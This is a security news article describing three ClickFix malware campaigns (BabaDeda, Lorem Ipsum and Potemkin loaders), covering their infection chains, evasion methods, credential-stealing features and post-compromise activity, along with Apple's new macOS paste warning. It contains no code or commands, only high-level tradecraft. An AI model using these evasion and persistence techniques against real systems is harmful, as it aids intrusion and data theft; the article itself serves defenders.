ClickFix Malware Campaigns Deliver BabaDeda, Lorem Ipsum, and Potemkin Loaders

Cybersecurity researchers have uncovered several active ClickFix campaigns distributing three sophisticated malware loaders: BabaDeda Loader, Lorem Ipsum Loader, and Potemkin. Independent investigations by security firms have revealed how threat actors are leveraging social engineering, compromised websites, and modular malware architectures to compromise victims across multiple industries.

The campaigns highlight a growing trend among cybercriminals: separating malware delivery, storage, execution, and payload deployment into independent components, making attacks harder to detect and analyze.

BabaDeda Loader Expands Its Capabilities

Researchers observed BabaDeda Loader attacks in April 2026 targeting organizations in the education and financial sectors.

According to security analysts, BabaDeda has evolved from a simple malware delivery framework into a highly flexible loader designed for stealth, evasion, and modular payload deployment.

The attack typically begins with a ClickFix social engineering lure that tricks victims into executing malicious PowerShell commands. Once activated, the loader downloads and deploys additional threats such as information stealers and remote access trojans (RATs).

To evade detection, BabaDeda Loader uses several advanced techniques, including:

• Hidden PowerShell execution
• In-memory shellcode loading
• DLL side-loading
• External payload storage
• Security software detection
• Geographic filtering to avoid Russian and Belarusian systems

The malware ultimately injects its payload into trusted Windows processes such as svchost.exe, helping it blend into normal system activity.

Information-Stealing Capabilities

One of the malware variants delivered through BabaDeda Loader is a .NET-based backdoor capable of collecting extensive system and user information.

Its functionality includes:

• Gathering system details
• Discovering browser profiles
• Stealing cookies, passwords, browsing history, and encryption keys
• Searching and exfiltrating files
• Capturing screenshots
• Executing commands remotely
• Establishing encrypted communication channels with command-and-control (C2) servers

Researchers also identified another attack chain that deploys DanaBot and SectopRAT using DLL side-loading techniques.

A particularly concerning component, known as Storage Crypter, stores malicious payloads inside seemingly harmless files and only decodes them immediately before execution. This significantly reduces forensic visibility and helps attackers bypass traditional security tools.

ClickFix Campaign Uses Compromised WordPress Sites

In a separate campaign, attackers have been exploiting compromised WordPress websites to distribute a newly discovered malware framework called Lorem Ipsum Loader.

Researchers identified at least five hacked websites across industries such as:

• Architecture
• Legal services
• Construction technology

This campaign marks a shift from previous tactics that relied on fake software download portals promoted through SEO poisoning and malicious advertising.

Security experts believe the malware has been active since February 2026.

Delivery Chain and Infection Process

Victims are presented with fake Microsoft Edge security update prompts designed to mimic legitimate browser notifications.

The malicious process involves:

1. Running a ClickFix command.
2. Downloading a ZIP archive.
3. Installing an outdated version of Node.js.
4. Executing JavaScript-based malware components.
5. Establishing persistence through DLL side-loading.
6. Decoding and launching Lorem Ipsum Loader.

Once active, the loader retrieves a secondary backdoor from attacker-controlled social media profiles that host command-and-control information.

Researchers have linked the operation to Vanilla Tempest, a financially motivated threat actor associated with ransomware families including:

• Rhysida
• BlackCat
• Zeppelin
• Quantum Locker

The campaign demonstrates how cybercriminal groups can rapidly adapt their delivery methods when previous infrastructure becomes ineffective.

Potemkin Loader Delivers EtherRAT and RMMProject

A third ClickFix campaign has been observed deploying a previously undocumented malware loader called Potemkin.

The infection chain begins with a malicious MSI installer that drops an HTML Application (HTA) payload. This payload then installs Potemkin, which serves as a delivery mechanism for:

• EtherRAT
• RMMProject

RMMProject is particularly dangerous because it includes modules capable of:

• Remote screen monitoring
• Browser credential theft
• Screenshot capture
• Arbitrary script execution
• Browser autofill data extraction
• Downloading and executing additional malware

Advanced Command-and-Control Features

Potemkin uses a domain generation algorithm (DGA) powered by a built-in dictionary containing over 1,000 words to locate its command-and-control infrastructure.

Additional features include:

• Victim identification using unique UUIDs
• Encrypted communication channels
• Dynamic task polling
• In-memory DLL execution
• Custom encryption methods

Following compromise, attackers have been observed conducting hands-on-keyboard activity, including:

• Creating Microsoft Defender exclusions
• Deploying Chisel reverse SOCKS tunnels
• Performing network reconnaissance
• Establishing Cloudflare tunnels
• Moving laterally across networks
• Propagating EtherRAT to multiple systems

Why ClickFix Continues to Succeed

Despite increased awareness, ClickFix remains one of the most effective social engineering techniques used by cybercriminals today.

The attack relies on a simple but powerful concept: convincing users to manually execute commands under the guise of legitimate troubleshooting or security procedures.

Researchers have observed ClickFix being used to distribute a variety of malware families targeting both Windows and macOS users, including information stealers and backdoors.

Attackers are also exploiting the growing popularity of artificial intelligence tools by distributing fake installers masquerading as AI applications.

Apple Responds with New Security Protections

The continued abuse of command-pasting attacks has prompted Apple to introduce a new security warning in macOS Tahoe 26.4.

The feature alerts users when applications or websites attempt to persuade them to paste commands into the Terminal app, helping prevent accidental execution of malicious instructions.

Apple notes that scammers frequently use websites, chat platforms, email messages, and other communication channels to convince users to run harmful commands that can compromise devices and personal data.

Final Thoughts

The emergence of BabaDeda Loader, Lorem Ipsum Loader, and Potemkin demonstrates how modern malware ecosystems are becoming increasingly modular, stealthy, and resilient.

As threat actors continue to refine ClickFix-based social engineering tactics, organizations must strengthen user awareness training, implement endpoint detection solutions, and closely monitor PowerShell and script execution activities.

The human element remains the weakest link in many attacks, making security awareness just as important as technical defenses in the fight against modern cyber threats.